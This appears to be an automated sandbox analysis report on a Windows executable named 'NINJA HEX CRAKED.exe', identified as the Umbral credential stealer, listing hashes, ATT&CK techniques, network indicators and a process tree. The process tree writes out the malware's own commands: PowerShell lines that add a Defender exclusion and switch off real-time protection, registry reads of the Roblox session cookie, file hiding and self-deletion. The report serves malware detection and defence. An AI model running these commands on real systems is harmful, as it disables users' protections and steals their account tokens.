umbral | 404ccd4c5dae49ea8f38a8bc283e0b488de49b04a45c3f6cfeecc3ac8162c18c

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
15-12-2024 19:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NINJA HEX CRAKED.exe
Size

254KB
MD5

6a5a18c107110aaa1b251bc168180320
SHA1

4ce77f9a2af47610f8f2a254b49ae33f2958ef08
SHA256

404ccd4c5dae49ea8f38a8bc283e0b488de49b04a45c3f6cfeecc3ac8162c18c
SHA512

d6447e04a21a151d4625b8400a7253e59daa32ae0e027f9b6d478a9139510d7398af0338ed36b0aad7aa1321f239219c5349823d84e4c5d1a55c93b2a02c641f
SSDEEP

6144:04oZo7J39KtWaV+CRB6jIx7axHUPGUphYc3YeRN66hn7DC8ej58bD:DoZA9Kd8jYPGUphYc3YeRN647k5e

Score

10^/10

umbral discovery execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral2/memory/4532-1-0x0000026C9ED70000-0x0000026C9EDB6000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4524	powershell.exe
3044	powershell.exe
3680	powershell.exe
2236	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	NINJA HEX CRAKED.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	discord.com
23	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ip-api.com

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4344	cmd.exe
1872	PING.EXE

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3644	wmic.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	firefox.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1872	PING.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
4532	NINJA HEX CRAKED.exe
2236	powershell.exe
2236	powershell.exe
4524	powershell.exe
4524	powershell.exe
3044	powershell.exe
3044	powershell.exe
4888	powershell.exe
4888	powershell.exe
3680	powershell.exe
3680	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2432	OpenWith.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4532	NINJA HEX CRAKED.exe
Token: SeIncreaseQuotaPrivilege	4396	wmic.exe
Token: SeSecurityPrivilege	4396	wmic.exe
Token: SeTakeOwnershipPrivilege	4396	wmic.exe
Token: SeLoadDriverPrivilege	4396	wmic.exe
Token: SeSystemProfilePrivilege	4396	wmic.exe
Token: SeSystemtimePrivilege	4396	wmic.exe
Token: SeProfSingleProcessPrivilege	4396	wmic.exe
Token: SeIncBasePriorityPrivilege	4396	wmic.exe
Token: SeCreatePagefilePrivilege	4396	wmic.exe
Token: SeBackupPrivilege	4396	wmic.exe
Token: SeRestorePrivilege	4396	wmic.exe
Token: SeShutdownPrivilege	4396	wmic.exe
Token: SeDebugPrivilege	4396	wmic.exe
Token: SeSystemEnvironmentPrivilege	4396	wmic.exe
Token: SeRemoteShutdownPrivilege	4396	wmic.exe
Token: SeUndockPrivilege	4396	wmic.exe
Token: SeManageVolumePrivilege	4396	wmic.exe
Token: 33	4396	wmic.exe
Token: 34	4396	wmic.exe
Token: 35	4396	wmic.exe
Token: 36	4396	wmic.exe
Token: SeIncreaseQuotaPrivilege	4396	wmic.exe
Token: SeSecurityPrivilege	4396	wmic.exe
Token: SeTakeOwnershipPrivilege	4396	wmic.exe
Token: SeLoadDriverPrivilege	4396	wmic.exe
Token: SeSystemProfilePrivilege	4396	wmic.exe
Token: SeSystemtimePrivilege	4396	wmic.exe
Token: SeProfSingleProcessPrivilege	4396	wmic.exe
Token: SeIncBasePriorityPrivilege	4396	wmic.exe
Token: SeCreatePagefilePrivilege	4396	wmic.exe
Token: SeBackupPrivilege	4396	wmic.exe
Token: SeRestorePrivilege	4396	wmic.exe
Token: SeShutdownPrivilege	4396	wmic.exe
Token: SeDebugPrivilege	4396	wmic.exe
Token: SeSystemEnvironmentPrivilege	4396	wmic.exe
Token: SeRemoteShutdownPrivilege	4396	wmic.exe
Token: SeUndockPrivilege	4396	wmic.exe
Token: SeManageVolumePrivilege	4396	wmic.exe
Token: 33	4396	wmic.exe
Token: 34	4396	wmic.exe
Token: 35	4396	wmic.exe
Token: 36	4396	wmic.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	4524	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	4888	powershell.exe
Token: SeIncreaseQuotaPrivilege	4560	wmic.exe
Token: SeSecurityPrivilege	4560	wmic.exe
Token: SeTakeOwnershipPrivilege	4560	wmic.exe
Token: SeLoadDriverPrivilege	4560	wmic.exe
Token: SeSystemProfilePrivilege	4560	wmic.exe
Token: SeSystemtimePrivilege	4560	wmic.exe
Token: SeProfSingleProcessPrivilege	4560	wmic.exe
Token: SeIncBasePriorityPrivilege	4560	wmic.exe
Token: SeCreatePagefilePrivilege	4560	wmic.exe
Token: SeBackupPrivilege	4560	wmic.exe
Token: SeRestorePrivilege	4560	wmic.exe
Token: SeShutdownPrivilege	4560	wmic.exe
Token: SeDebugPrivilege	4560	wmic.exe
Token: SeSystemEnvironmentPrivilege	4560	wmic.exe
Token: SeRemoteShutdownPrivilege	4560	wmic.exe
Token: SeUndockPrivilege	4560	wmic.exe
Token: SeManageVolumePrivilege	4560	wmic.exe

Suspicious use of FindShellTrayWindow 31 IoCs

pid	Process
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe

Suspicious use of SendNotifyMessage 30 IoCs

pid	Process
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe
1808	firefox.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2432	OpenWith.exe
1808	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4532 wrote to memory of 4396	4532	NINJA HEX CRAKED.exe	83
PID 4532 wrote to memory of 4396	4532	NINJA HEX CRAKED.exe	83
PID 4532 wrote to memory of 4372	4532	NINJA HEX CRAKED.exe	86
PID 4532 wrote to memory of 4372	4532	NINJA HEX CRAKED.exe	86
PID 4532 wrote to memory of 2236	4532	NINJA HEX CRAKED.exe	88
PID 4532 wrote to memory of 2236	4532	NINJA HEX CRAKED.exe	88
PID 4532 wrote to memory of 4524	4532	NINJA HEX CRAKED.exe	90
PID 4532 wrote to memory of 4524	4532	NINJA HEX CRAKED.exe	90
PID 4532 wrote to memory of 3044	4532	NINJA HEX CRAKED.exe	92
PID 4532 wrote to memory of 3044	4532	NINJA HEX CRAKED.exe	92
PID 4532 wrote to memory of 4888	4532	NINJA HEX CRAKED.exe	94
PID 4532 wrote to memory of 4888	4532	NINJA HEX CRAKED.exe	94
PID 4532 wrote to memory of 4560	4532	NINJA HEX CRAKED.exe	97
PID 4532 wrote to memory of 4560	4532	NINJA HEX CRAKED.exe	97
PID 4532 wrote to memory of 1688	4532	NINJA HEX CRAKED.exe	99
PID 4532 wrote to memory of 1688	4532	NINJA HEX CRAKED.exe	99
PID 4532 wrote to memory of 2056	4532	NINJA HEX CRAKED.exe	101
PID 4532 wrote to memory of 2056	4532	NINJA HEX CRAKED.exe	101
PID 4532 wrote to memory of 3680	4532	NINJA HEX CRAKED.exe	103
PID 4532 wrote to memory of 3680	4532	NINJA HEX CRAKED.exe	103
PID 4532 wrote to memory of 3644	4532	NINJA HEX CRAKED.exe	105
PID 4532 wrote to memory of 3644	4532	NINJA HEX CRAKED.exe	105
PID 4532 wrote to memory of 4344	4532	NINJA HEX CRAKED.exe	107
PID 4532 wrote to memory of 4344	4532	NINJA HEX CRAKED.exe	107
PID 4344 wrote to memory of 1872	4344	cmd.exe	109
PID 4344 wrote to memory of 1872	4344	cmd.exe	109
PID 1980 wrote to memory of 1808	1980	firefox.exe	144
PID 1980 wrote to memory of 1808	1980	firefox.exe	144
PID 1980 wrote to memory of 1808	1980	firefox.exe	144
PID 1980 wrote to memory of 1808	1980	firefox.exe	144
PID 1980 wrote to memory of 1808	1980	firefox.exe	144
PID 1980 wrote to memory of 1808	1980	firefox.exe	144
PID 1980 wrote to memory of 1808	1980	firefox.exe	144
PID 1980 wrote to memory of 1808	1980	firefox.exe	144
PID 1980 wrote to memory of 1808	1980	firefox.exe	144
PID 1980 wrote to memory of 1808	1980	firefox.exe	144
PID 1980 wrote to memory of 1808	1980	firefox.exe	144
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145
PID 1808 wrote to memory of 2296	1808	firefox.exe	145

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4372	attrib.exe

C:\Users\Admin\AppData\Local\Temp\NINJA HEX CRAKED.exe
"C:\Users\Admin\AppData\Local\Temp\NINJA HEX CRAKED.exe"
1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4532
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4396
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\NINJA HEX CRAKED.exe"
  2⤵
  - Views/modifies file attributes
  PID:4372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NINJA HEX CRAKED.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2236
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4888
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4560
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:1688
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:2056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3680
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:3644
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\NINJA HEX CRAKED.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4344
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1872

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\CompressUnblock.cmd" "
1⤵
PID:3900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\CompressUnblock.cmd" "
1⤵
PID:1108

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2432

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1980
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1808
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d24fb00e-56e2-4242-a10b-3f6250ae6b09} 1808 "\\.\pipe\gecko-crash-server-pipe.1808" gpu
    3⤵
    PID:2296
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2404 -prefMapHandle 2400 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {df056c75-8479-45f5-9dd4-51cffbf838a5} 1808 "\\.\pipe\gecko-crash-server-pipe.1808" socket
    3⤵
    PID:4128
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2728 -childID 1 -isForBrowser -prefsHandle 3208 -prefMapHandle 3196 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0cb82970-28c9-4745-9181-1f31db57b895} 1808 "\\.\pipe\gecko-crash-server-pipe.1808" tab
    3⤵
    PID:2924
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4204 -childID 2 -isForBrowser -prefsHandle 4196 -prefMapHandle 4192 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ab0e174-3b97-4ca8-be9f-210c84993815} 1808 "\\.\pipe\gecko-crash-server-pipe.1808" tab
    3⤵
    PID:1488
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4736 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4788 -prefMapHandle 4784 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {390f1f4b-1ff9-410e-a392-0c79e8ec0839} 1808 "\\.\pipe\gecko-crash-server-pipe.1808" utility
    3⤵
    - Checks processor information in registry
    PID:5192
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5496 -childID 3 -isForBrowser -prefsHandle 5440 -prefMapHandle 5436 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a09c835-49c7-432a-aff0-586982a62c55} 1808 "\\.\pipe\gecko-crash-server-pipe.1808" tab
    3⤵
    PID:5656
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5648 -childID 4 -isForBrowser -prefsHandle 5596 -prefMapHandle 5488 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b024635c-9a7e-4a6c-b3f4-50b0dc71bd9a} 1808 "\\.\pipe\gecko-crash-server-pipe.1808" tab
    3⤵
    PID:5668
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5812 -childID 5 -isForBrowser -prefsHandle 5820 -prefMapHandle 5824 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f654ff9-e846-4f78-8460-356525223cdd} 1808 "\\.\pipe\gecko-crash-server-pipe.1808" tab
    3⤵
    PID:5684
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3096 -childID 6 -isForBrowser -prefsHandle 3532 -prefMapHandle 6272 -prefsLen 27442 -prefMapSize 244658 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f02a12f-d08f-423f-813e-eeac3bddbdd6} 1808 "\\.\pipe\gecko-crash-server-pipe.1808" tab
    3⤵
    PID:4564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
dcd83f3a9bd52a6c0821eb961e87f0b9

SHA1
553ced8b5bdca9bf3379571948efe530628e78ea

SHA256
da3851259b355076f41331c3864fdcd7688b05ca312f6fcdb420f710ed7cfeaa

SHA512
fd76f13f1c8f1e73be04a615c9b010dde5cbf889642d187d410db32d4fdda9d0e994654fa468643ed8fe7563c07a8d1df30b2f5b26856946ed9b2d18d10a4fa5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
277f918918ca1de032c2948911ecb93c

SHA1
0307e48f22426ecfccad2f8eb0e69937ab957620

SHA256
f1a2de3d06fea09450f785b6746c54aaa5576fd844a42f95bd6776cf6105109f

SHA512
043d2ec78967055dd38d423277964681d9e0720eeb9cbf258c7ec753146d261a613a1e3b7adb9ab277f4657a21230e1c00d8fa96fcdf337c4a63cc1226fd52fb

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\activity-stream.discovery_stream.json

Filesize
20KB

MD5
266b69c93285e981444c377270f39aee

SHA1
aeb70dd4ec47e7a738372f26ee3d75c8d080c23c

SHA256
e6f2f5eefb72788adbb3115bdf88bb1f25d5d461ae4007cbb4198deb20171d6f

SHA512
5f9cbe83d633f3385faa9bd359722728da2d3b30fea6efb683690848325e9305a0420c96fdc15880cba8cd8c31c8af1e4e0570a9253d6b6d14d688176d0d55b0

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

Filesize
15KB

MD5
96c542dec016d9ec1ecc4dddfcbaac66

SHA1
6199f7648bb744efa58acf7b96fee85d938389e4

SHA256
7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

SHA512
cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_54shwkpm.nd3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\AlternateServices.bin

Filesize
8KB

MD5
7ae3a9ddfd35779a01fea4b4988ab0d3

SHA1
5d3e99d97fd413fde77d510a69d88435d8dc74bf

SHA256
731c0e3ca136f4ce2a5a41b1d50194314cb9245830e8e7343b78340d94332950

SHA512
a6a92f2b6c0e0c853daf074e62a58a5ec29902dc9eb2d4efd255486dbe4deb8ba9a455b19415790b74758c2456cf99df243a42a6efa58a8a8b9e8fdfe4727302

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\AlternateServices.bin

Filesize
12KB

MD5
9438e3db5b3d1bb6d1b5aeb4e296ebf0

SHA1
46a0399751a70f92e3f359a1e226d23be5d38ead

SHA256
16e286ac93d02506a22c4ecf53a705f173ac59bc6afbd9a05e877df693c49943

SHA512
975d801637e5eea03a51ba26cb7fc31b4b4ddbec50f18d043a1ed0c490f976f7eadfa5710ddafcb356a3faeeeaf10d5a77df9335bf96da48d09d757b4f23574c

Download Submit
